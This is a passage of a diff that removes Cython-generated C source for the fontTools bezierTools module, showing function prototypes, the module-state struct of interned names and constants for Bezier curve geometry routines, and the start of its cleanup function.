PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s, PyObject *__pyx_v_e, PyObject *__pyx_v_pt); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_origin); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s1, PyObject *__pyx_v_e1, PyObject *__pyx_v_s2, PyObject *__pyx_v_e2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segment); /* proto */ -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_r); /* proto */ -static PyObject *__pyx_lambda_funcdef_lambda3(PyObject *__pyx_self, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2, PyObject *__pyx_v_precision, PyObject *__pyx_v_range1, PyObject *__pyx_v_range2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg1, PyObject *__pyx_v_seg2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject 
*__pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_obj); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segments); /* proto */ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -/* #### Code section: late_includes ### */ -/* #### Code section: module_state ### */ -typedef struct { - PyObject *__pyx_d; - PyObject *__pyx_b; - PyObject *__pyx_cython_runtime; - PyObject *__pyx_empty_tuple; - PyObject *__pyx_empty_bytes; - PyObject *__pyx_empty_unicode; - #ifdef __Pyx_CyFunction_USED - PyTypeObject *__pyx_CyFunctionType; - #endif - #ifdef __Pyx_FusedFunction_USED - PyTypeObject *__pyx_FusedFunctionType; - #endif - #ifdef __Pyx_Generator_USED - PyTypeObject *__pyx_GeneratorType; - #endif - #ifdef __Pyx_IterableCoroutine_USED - PyTypeObject *__pyx_IterableCoroutineType; - #endif - #ifdef __Pyx_Coroutine_USED - PyTypeObject 
*__pyx_CoroutineAwaitType; - #endif - #ifdef __Pyx_Coroutine_USED - PyTypeObject *__pyx_CoroutineType; - #endif - #if CYTHON_USE_MODULE_STATE - #endif - #if CYTHON_USE_MODULE_STATE - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - #endif - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - PyObject *__pyx_n_s_1_t; - PyObject *__pyx_n_s_1_t_2; - PyObject *__pyx_n_s_2_t_1_t; - PyObject *__pyx_kp_u_Approximates_the_arc_length_for; - PyObject *__pyx_n_s_AttributeError; - PyObject *__pyx_n_s_COMPILED; - PyObject *__pyx_kp_u_Calculates_the_arc_length_for_a; - PyObject *__pyx_kp_u_Calculates_the_bounding_rectangl; - PyObject *__pyx_kp_u_Calculates_the_bounding_rectangl_2; - PyObject *__pyx_kp_u_Couldn_t_work_out_which_intersec; - PyObject *__pyx_n_s_DD; - PyObject *__pyx_kp_u_Finds_intersections_between_a_cu; - 
PyObject *__pyx_kp_u_Finds_intersections_between_a_cu_2; - PyObject *__pyx_kp_u_Finds_intersections_between_two; - PyObject *__pyx_kp_u_Finds_intersections_between_two_2; - PyObject *__pyx_n_s_Identity; - PyObject *__pyx_n_s_ImportError; - PyObject *__pyx_n_s_Intersection; - PyObject *__pyx_n_u_Intersection; - PyObject *__pyx_n_s_Len; - PyObject *__pyx_kp_s_Lib_fontTools_misc_bezierTools_p; - PyObject *__pyx_n_s_Q; - PyObject *__pyx_n_s_Q3; - PyObject *__pyx_n_s_R; - PyObject *__pyx_n_s_R2; - PyObject *__pyx_n_s_R2_Q3; - PyObject *__pyx_kp_u_Solve_a_cubic_equation_Solves_a; - PyObject *__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a; - PyObject *__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on; - PyObject *__pyx_kp_u_Split_a_line_at_a_given_coordina; - PyObject *__pyx_kp_u_Split_a_quadratic_Bezier_curve_a; - PyObject *__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2; - PyObject *__pyx_n_s_TypeError; - PyObject *__pyx_kp_u_Unknown_curve_degree; - PyObject *__pyx_n_s_ValueError; - PyObject *__pyx_kp_u__10; - PyObject *__pyx_n_s__103; - PyObject *__pyx_n_s__11; - PyObject *__pyx_kp_u__9; - PyObject *__pyx_n_s__91; - PyObject *__pyx_n_s_a; - PyObject *__pyx_n_s_a1; - PyObject *__pyx_n_s_a1_3; - PyObject *__pyx_n_s_a1x; - PyObject *__pyx_n_s_a1y; - PyObject *__pyx_n_s_a2; - PyObject *__pyx_n_s_a3; - PyObject *__pyx_n_s_acos; - PyObject *__pyx_n_s_aligned_curve; - PyObject *__pyx_n_s_alignment_transformation; - PyObject *__pyx_n_s_all; - PyObject *__pyx_n_s_angle; - PyObject *__pyx_n_s_append; - PyObject *__pyx_n_s_approximateCubicArcLength; - PyObject *__pyx_n_u_approximateCubicArcLength; - PyObject *__pyx_n_s_approximateCubicArcLengthC; - PyObject *__pyx_n_u_approximateCubicArcLengthC; - PyObject *__pyx_kp_u_approximateCubicArcLength_line_3; - PyObject *__pyx_n_s_approximateQuadraticArcLength; - PyObject *__pyx_n_u_approximateQuadraticArcLength; - PyObject *__pyx_n_s_approximateQuadraticArcLengthC; - PyObject *__pyx_n_u_approximateQuadraticArcLengthC; - PyObject *__pyx_n_s_arch; - 
PyObject *__pyx_n_s_args; - PyObject *__pyx_n_s_asinh; - PyObject *__pyx_n_s_asyncio_coroutines; - PyObject *__pyx_n_s_atan2; - PyObject *__pyx_n_s_ax; - PyObject *__pyx_n_s_ax2; - PyObject *__pyx_n_s_ax3; - PyObject *__pyx_n_s_ay; - PyObject *__pyx_n_s_ay2; - PyObject *__pyx_n_s_ay3; - PyObject *__pyx_n_s_b; - PyObject *__pyx_n_s_b1; - PyObject *__pyx_n_s_b1x; - PyObject *__pyx_n_s_b1y; - PyObject *__pyx_n_s_both_points_are_on_same_side_of; - PyObject *__pyx_n_s_bounds1; - PyObject *__pyx_n_s_bounds2; - PyObject *__pyx_n_s_box; - PyObject *__pyx_n_s_bx; - PyObject *__pyx_n_s_bx2; - PyObject *__pyx_n_s_by; - PyObject *__pyx_n_s_by2; - PyObject *__pyx_n_s_c; - PyObject *__pyx_n_s_c1; - PyObject *__pyx_n_s_c11; - PyObject *__pyx_n_s_c11_range; - PyObject *__pyx_n_s_c12; - PyObject *__pyx_n_s_c12_range; - PyObject *__pyx_n_s_c1x; - PyObject *__pyx_n_s_c1y; - PyObject *__pyx_n_s_c21; - PyObject *__pyx_n_s_c21_range; - PyObject *__pyx_n_s_c22; - PyObject *__pyx_n_s_c22_range; - PyObject *__pyx_n_s_calcBounds; - PyObject *__pyx_n_s_calcCubicArcLength; - PyObject *__pyx_n_u_calcCubicArcLength; - PyObject *__pyx_n_s_calcCubicArcLengthC; - PyObject *__pyx_n_u_calcCubicArcLengthC; - PyObject *__pyx_n_s_calcCubicArcLengthCRecurse; - PyObject *__pyx_n_s_calcCubicBounds; - PyObject *__pyx_n_u_calcCubicBounds; - PyObject *__pyx_kp_u_calcCubicBounds_line_412; - PyObject *__pyx_n_s_calcCubicParameters; - PyObject *__pyx_n_s_calcCubicPoints; - PyObject *__pyx_n_s_calcQuadraticArcLength; - PyObject *__pyx_n_u_calcQuadraticArcLength; - PyObject *__pyx_n_s_calcQuadraticArcLengthC; - PyObject *__pyx_n_u_calcQuadraticArcLengthC; - PyObject *__pyx_kp_u_calcQuadraticArcLength_line_151; - PyObject *__pyx_n_s_calcQuadraticBounds; - PyObject *__pyx_n_u_calcQuadraticBounds; - PyObject *__pyx_kp_u_calcQuadraticBounds_line_298; - PyObject *__pyx_n_s_calcQuadraticParameters; - PyObject *__pyx_n_s_calcQuadraticPoints; - PyObject *__pyx_n_s_class_getitem; - PyObject *__pyx_n_s_cline_in_traceback; 
- PyObject *__pyx_n_s_close; - PyObject *__pyx_n_s_collections; - PyObject *__pyx_n_s_cos; - PyObject *__pyx_n_s_cubicPointAtT; - PyObject *__pyx_n_u_cubicPointAtT; - PyObject *__pyx_n_s_cubicPointAtTC; - PyObject *__pyx_n_u_cubicPointAtTC; - PyObject *__pyx_n_s_curve; - PyObject *__pyx_n_s_curve1; - PyObject *__pyx_n_s_curve2; - PyObject *__pyx_n_s_curveCurveIntersections; - PyObject *__pyx_n_u_curveCurveIntersections; - PyObject *__pyx_kp_u_curveCurveIntersections_line_137; - PyObject *__pyx_n_s_curveLineIntersections; - PyObject *__pyx_n_u_curveLineIntersections; - PyObject *__pyx_kp_u_curveLineIntersections_line_1248; - PyObject *__pyx_n_s_curve_bounds; - PyObject *__pyx_n_s_curve_curve_intersections_t; - PyObject *__pyx_n_s_curve_curve_intersections_t_loc; - PyObject *__pyx_n_s_curve_curve_intersections_t_loc_2; - PyObject *__pyx_n_s_curve_line_intersections_t; - PyObject *__pyx_n_s_curve_line_intersections_t_loca; - PyObject *__pyx_n_s_cx; - PyObject *__pyx_n_s_cy; - PyObject *__pyx_n_s_cython; - PyObject *__pyx_n_s_d; - PyObject *__pyx_n_s_d0; - PyObject *__pyx_n_s_d1; - PyObject *__pyx_n_s_d1x; - PyObject *__pyx_n_s_d1y; - PyObject *__pyx_n_s_delta; - PyObject *__pyx_n_s_delta_2; - PyObject *__pyx_n_s_delta_3; - PyObject *__pyx_n_s_deriv3; - PyObject *__pyx_kp_u_disable; - PyObject *__pyx_n_s_doctest; - PyObject *__pyx_n_s_dx; - PyObject *__pyx_n_s_dy; - PyObject *__pyx_n_s_e; - PyObject *__pyx_n_s_e1; - PyObject *__pyx_n_s_e1x; - PyObject *__pyx_n_s_e1y; - PyObject *__pyx_n_s_e2; - PyObject *__pyx_n_s_e2x; - PyObject *__pyx_n_s_e2y; - PyObject *__pyx_kp_u_enable; - PyObject *__pyx_n_s_end; - PyObject *__pyx_n_s_epsilon; - PyObject *__pyx_n_s_epsilonDigits; - PyObject *__pyx_n_s_ex; - PyObject *__pyx_n_s_exit; - PyObject *__pyx_n_s_ey; - PyObject *__pyx_n_s_failed; - PyObject *__pyx_n_s_fontTools_misc; - PyObject *__pyx_n_s_fontTools_misc_arrayTools; - PyObject *__pyx_n_s_fontTools_misc_bezierTools; - PyObject *__pyx_n_s_fontTools_misc_transform; - PyObject 
*__pyx_n_s_found; - PyObject *__pyx_kp_u_g; - PyObject *__pyx_kp_u_gc; - PyObject *__pyx_n_s_genexpr; - PyObject *__pyx_n_s_i; - PyObject *__pyx_n_s_import; - PyObject *__pyx_n_s_initializing; - PyObject *__pyx_n_s_insert; - PyObject *__pyx_n_s_intersection_ts; - PyObject *__pyx_n_s_intersections; - PyObject *__pyx_n_s_intersects; - PyObject *__pyx_n_s_isHorizontal; - PyObject *__pyx_n_s_is_coroutine; - PyObject *__pyx_n_s_isclose; - PyObject *__pyx_kp_u_isenabled; - PyObject *__pyx_n_s_it; - PyObject *__pyx_n_s_key; - PyObject *__pyx_n_s_line; - PyObject *__pyx_n_s_lineLineIntersections; - PyObject *__pyx_n_u_lineLineIntersections; - PyObject *__pyx_kp_u_lineLineIntersections_line_1147; - PyObject *__pyx_n_s_linePointAtT; - PyObject *__pyx_n_u_linePointAtT; - PyObject *__pyx_n_s_line_t; - PyObject *__pyx_n_s_line_t_of_pt; - PyObject *__pyx_n_s_main; - PyObject *__pyx_n_u_main; - PyObject *__pyx_n_s_math; - PyObject *__pyx_n_s_mid; - PyObject *__pyx_n_s_midPt; - PyObject *__pyx_n_s_midpoint; - PyObject *__pyx_n_s_mult; - PyObject *__pyx_n_s_n; - PyObject *__pyx_n_s_name; - PyObject *__pyx_n_s_namedtuple; - PyObject *__pyx_n_s_obj; - PyObject *__pyx_n_s_off1; - PyObject *__pyx_n_s_off2; - PyObject *__pyx_n_s_one; - PyObject *__pyx_n_s_origDist; - PyObject *__pyx_n_s_origin; - PyObject *__pyx_n_s_p0; - PyObject *__pyx_n_s_p1; - PyObject *__pyx_n_s_p2; - PyObject *__pyx_n_s_p3; - PyObject *__pyx_n_s_pi; - PyObject *__pyx_n_s_pointAtT; - PyObject *__pyx_n_s_pointFinder; - PyObject *__pyx_n_s_points; - PyObject *__pyx_n_s_precision; - PyObject *__pyx_n_s_print; - PyObject *__pyx_n_s_printSegments; - PyObject *__pyx_n_s_pt; - PyObject *__pyx_n_u_pt; - PyObject *__pyx_n_s_pt1; - PyObject *__pyx_n_s_pt1x; - PyObject *__pyx_n_s_pt1y; - PyObject *__pyx_n_s_pt2; - PyObject *__pyx_n_s_pt2x; - PyObject *__pyx_n_s_pt2y; - PyObject *__pyx_n_s_pt3; - PyObject *__pyx_n_s_pt4; - PyObject *__pyx_n_s_px; - PyObject *__pyx_n_s_py; - PyObject *__pyx_n_s_quadraticPointAtT; - PyObject 
*__pyx_n_u_quadraticPointAtT; - PyObject *__pyx_n_s_r; - PyObject *__pyx_n_s_rDD; - PyObject *__pyx_n_s_rQ2; - PyObject *__pyx_n_s_range; - PyObject *__pyx_n_s_range1; - PyObject *__pyx_n_s_range2; - PyObject *__pyx_n_s_rectArea; - PyObject *__pyx_n_s_roots; - PyObject *__pyx_n_s_rotate; - PyObject *__pyx_n_s_round; - PyObject *__pyx_n_s_s; - PyObject *__pyx_n_s_s1; - PyObject *__pyx_n_s_s1x; - PyObject *__pyx_n_s_s1y; - PyObject *__pyx_n_s_s2; - PyObject *__pyx_n_s_s2x; - PyObject *__pyx_n_s_s2y; - PyObject *__pyx_kp_u_s_2; - PyObject *__pyx_n_s_scale; - PyObject *__pyx_n_s_sectRect; - PyObject *__pyx_n_s_seen; - PyObject *__pyx_n_s_seg; - PyObject *__pyx_n_s_seg1; - PyObject *__pyx_n_s_seg2; - PyObject *__pyx_n_s_segment; - PyObject *__pyx_n_s_segmentPointAtT; - PyObject *__pyx_n_u_segmentPointAtT; - PyObject *__pyx_n_s_segmentSegmentIntersections; - PyObject *__pyx_n_u_segmentSegmentIntersections; - PyObject *__pyx_kp_u_segmentSegmentIntersections_line; - PyObject *__pyx_n_s_segmentrepr; - PyObject *__pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2; - PyObject *__pyx_kp_u_segmentrepr_line_1449; - PyObject *__pyx_n_s_segmentrepr_locals_genexpr; - PyObject *__pyx_n_s_segments; - PyObject *__pyx_n_s_send; - PyObject *__pyx_n_s_slope12; - PyObject *__pyx_n_s_slope34; - PyObject *__pyx_n_s_solutions; - PyObject *__pyx_n_s_solveCubic; - PyObject *__pyx_n_u_solveCubic; - PyObject *__pyx_kp_u_solveCubic_line_841; - PyObject *__pyx_n_s_solveQuadratic; - PyObject *__pyx_n_u_solveQuadratic; - PyObject *__pyx_n_s_spec; - PyObject *__pyx_n_s_splitCubic; - PyObject *__pyx_n_u_splitCubic; - PyObject *__pyx_n_s_splitCubicAtT; - PyObject *__pyx_n_s_splitCubicAtTC; - PyObject *__pyx_n_u_splitCubicAtTC; - PyObject *__pyx_n_s_splitCubicAtTC_2; - PyObject *__pyx_n_s_splitCubicAtT_2; - PyObject *__pyx_n_u_splitCubicAtT_2; - PyObject *__pyx_kp_u_splitCubicAtT_line_613; - PyObject *__pyx_n_s_splitCubicIntoTwoAtTC; - PyObject *__pyx_n_u_splitCubicIntoTwoAtTC; - PyObject 
*__pyx_kp_u_splitCubic_line_552; - PyObject *__pyx_n_s_splitCubic_locals_genexpr; - PyObject *__pyx_n_s_splitLine; - PyObject *__pyx_n_u_splitLine; - PyObject *__pyx_kp_u_splitLine_line_450; - PyObject *__pyx_n_s_splitQuadratic; - PyObject *__pyx_n_u_splitQuadratic; - PyObject *__pyx_n_s_splitQuadraticAtT; - PyObject *__pyx_n_s_splitQuadraticAtT_2; - PyObject *__pyx_n_u_splitQuadraticAtT_2; - PyObject *__pyx_kp_u_splitQuadraticAtT_line_589; - PyObject *__pyx_kp_u_splitQuadratic_line_507; - PyObject *__pyx_n_s_splitQuadratic_locals_genexpr; - PyObject *__pyx_n_s_split_cubic_into_two; - PyObject *__pyx_n_s_split_segment_at_t; - PyObject *__pyx_n_s_sqrt; - PyObject *__pyx_n_s_start; - PyObject *__pyx_n_s_swapped; - PyObject *__pyx_n_s_sx; - PyObject *__pyx_n_s_sy; - PyObject *__pyx_n_s_sys; - PyObject *__pyx_n_s_t; - PyObject *__pyx_n_s_t1; - PyObject *__pyx_n_u_t1; - PyObject *__pyx_n_s_t1_2; - PyObject *__pyx_n_s_t1_3; - PyObject *__pyx_n_s_t2; - PyObject *__pyx_n_u_t2; - PyObject *__pyx_n_s_test; - PyObject *__pyx_n_s_testmod; - PyObject *__pyx_n_s_theta; - PyObject *__pyx_n_s_throw; - PyObject *__pyx_n_s_tolerance; - PyObject *__pyx_n_s_transformPoints; - PyObject *__pyx_n_s_translate; - PyObject *__pyx_n_s_ts; - PyObject *__pyx_n_s_two; - PyObject *__pyx_n_s_unique_key; - PyObject *__pyx_n_s_unique_values; - PyObject *__pyx_n_s_v0; - PyObject *__pyx_n_s_v1; - PyObject *__pyx_n_s_v2; - PyObject *__pyx_n_s_v3; - PyObject *__pyx_n_s_v4; - PyObject *__pyx_n_s_where; - PyObject *__pyx_n_s_x; - PyObject *__pyx_n_s_x0; - PyObject *__pyx_n_s_x1; - PyObject *__pyx_n_s_x2; - PyObject *__pyx_n_s_x3; - PyObject *__pyx_n_s_x4; - PyObject *__pyx_n_s_xDiff; - PyObject *__pyx_n_s_xRoots; - PyObject *__pyx_n_s_y; - PyObject *__pyx_n_s_y1; - PyObject *__pyx_n_s_y2; - PyObject *__pyx_n_s_y3; - PyObject *__pyx_n_s_y4; - PyObject *__pyx_n_s_yDiff; - PyObject *__pyx_n_s_yRoots; - PyObject *__pyx_float_0_0; - PyObject *__pyx_float_0_5; - PyObject *__pyx_float_1_0; - PyObject 
*__pyx_float_2_0; - PyObject *__pyx_float_3_0; - PyObject *__pyx_float_4_0; - PyObject *__pyx_float_9_0; - PyObject *__pyx_float_1eneg_3; - PyObject *__pyx_float_27_0; - PyObject *__pyx_float_54_0; - PyObject *__pyx_float_0_005; - PyObject *__pyx_float_0_125; - PyObject *__pyx_float_1eneg_10; - PyObject *__pyx_float_neg_2_0; - PyObject *__pyx_int_0; - PyObject *__pyx_int_1; - PyObject *__pyx_int_2; - PyObject *__pyx_int_3; - PyObject *__pyx_int_6; - PyObject *__pyx_int_neg_1; - PyObject *__pyx_codeobj_; - PyObject *__pyx_tuple__2; - PyObject *__pyx_tuple__4; - PyObject *__pyx_tuple__5; - PyObject *__pyx_tuple__6; - PyObject *__pyx_tuple__8; - PyObject *__pyx_tuple__12; - PyObject *__pyx_tuple__14; - PyObject *__pyx_tuple__15; - PyObject *__pyx_tuple__17; - PyObject *__pyx_tuple__19; - PyObject *__pyx_tuple__21; - PyObject *__pyx_tuple__23; - PyObject *__pyx_tuple__26; - PyObject *__pyx_tuple__28; - PyObject *__pyx_tuple__30; - PyObject *__pyx_tuple__32; - PyObject *__pyx_tuple__34; - PyObject *__pyx_tuple__36; - PyObject *__pyx_tuple__38; - PyObject *__pyx_tuple__40; - PyObject *__pyx_tuple__42; - PyObject *__pyx_tuple__44; - PyObject *__pyx_tuple__46; - PyObject *__pyx_tuple__48; - PyObject *__pyx_tuple__50; - PyObject *__pyx_tuple__52; - PyObject *__pyx_tuple__53; - PyObject *__pyx_tuple__55; - PyObject *__pyx_tuple__57; - PyObject *__pyx_tuple__59; - PyObject *__pyx_tuple__61; - PyObject *__pyx_tuple__63; - PyObject *__pyx_tuple__65; - PyObject *__pyx_tuple__67; - PyObject *__pyx_tuple__69; - PyObject *__pyx_tuple__71; - PyObject *__pyx_tuple__73; - PyObject *__pyx_tuple__75; - PyObject *__pyx_tuple__77; - PyObject *__pyx_tuple__79; - PyObject *__pyx_tuple__81; - PyObject *__pyx_tuple__83; - PyObject *__pyx_tuple__85; - PyObject *__pyx_tuple__87; - PyObject *__pyx_tuple__89; - PyObject *__pyx_tuple__92; - PyObject *__pyx_tuple__94; - PyObject *__pyx_tuple__95; - PyObject *__pyx_tuple__97; - PyObject *__pyx_tuple__99; - PyObject *__pyx_codeobj__3; - PyObject 
*__pyx_codeobj__7; - PyObject *__pyx_tuple__101; - PyObject *__pyx_codeobj__13; - PyObject *__pyx_codeobj__16; - PyObject *__pyx_codeobj__18; - PyObject *__pyx_codeobj__20; - PyObject *__pyx_codeobj__22; - PyObject *__pyx_codeobj__24; - PyObject *__pyx_codeobj__25; - PyObject *__pyx_codeobj__27; - PyObject *__pyx_codeobj__29; - PyObject *__pyx_codeobj__31; - PyObject *__pyx_codeobj__33; - PyObject *__pyx_codeobj__35; - PyObject *__pyx_codeobj__37; - PyObject *__pyx_codeobj__39; - PyObject *__pyx_codeobj__41; - PyObject *__pyx_codeobj__43; - PyObject *__pyx_codeobj__45; - PyObject *__pyx_codeobj__47; - PyObject *__pyx_codeobj__49; - PyObject *__pyx_codeobj__51; - PyObject *__pyx_codeobj__54; - PyObject *__pyx_codeobj__56; - PyObject *__pyx_codeobj__58; - PyObject *__pyx_codeobj__60; - PyObject *__pyx_codeobj__62; - PyObject *__pyx_codeobj__64; - PyObject *__pyx_codeobj__66; - PyObject *__pyx_codeobj__68; - PyObject *__pyx_codeobj__70; - PyObject *__pyx_codeobj__72; - PyObject *__pyx_codeobj__74; - PyObject *__pyx_codeobj__76; - PyObject *__pyx_codeobj__78; - PyObject *__pyx_codeobj__80; - PyObject *__pyx_codeobj__82; - PyObject *__pyx_codeobj__84; - PyObject *__pyx_codeobj__86; - PyObject *__pyx_codeobj__88; - PyObject *__pyx_codeobj__90; - PyObject *__pyx_codeobj__93; - PyObject *__pyx_codeobj__96; - PyObject *__pyx_codeobj__98; - PyObject *__pyx_codeobj__100; - PyObject *__pyx_codeobj__102; -} __pyx_mstate; - -#if CYTHON_USE_MODULE_STATE -#ifdef __cplusplus -namespace { - extern struct PyModuleDef __pyx_moduledef; -} /* anonymous namespace */ -#else -static struct PyModuleDef __pyx_moduledef; -#endif - -#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) - -#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) - -#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) -#else -static __pyx_mstate __pyx_mstate_global_static = -#ifdef __cplusplus - {}; -#else - {0}; -#endif -static __pyx_mstate *__pyx_mstate_global = 
&__pyx_mstate_global_static; -#endif -/* #### Code section: module_state_clear ### */ -#if CYTHON_USE_MODULE_STATE -static int __pyx_m_clear(PyObject *m) { - __pyx_mstate *clear_module_state = __pyx_mstate(m); - if (!clear_module_state) return 0; - Py_CLEAR(clear_module_state->__pyx_d); - Py_CLEAR(clear_module_state->__pyx_b); - Py_CLEAR(clear_module_state->__pyx_cython_runtime); - Py_CLEAR(clear_module_state->__pyx_empty_tuple); - Py_CLEAR(clear_module_state->__pyx_empty_bytes); - Py_CLEAR(clear_module_state->__pyx_empty_unicode); - #ifdef __Pyx_CyFunction_USED - Py_CLEAR(clear_module_state->__pyx_CyFunctionType); - #endif - #ifdef __Pyx_FusedFunction_USED - Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); - #endif - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_CLEAR(clear_module_state->__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr); - Py_CLEAR(clear_module_state->__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC); - 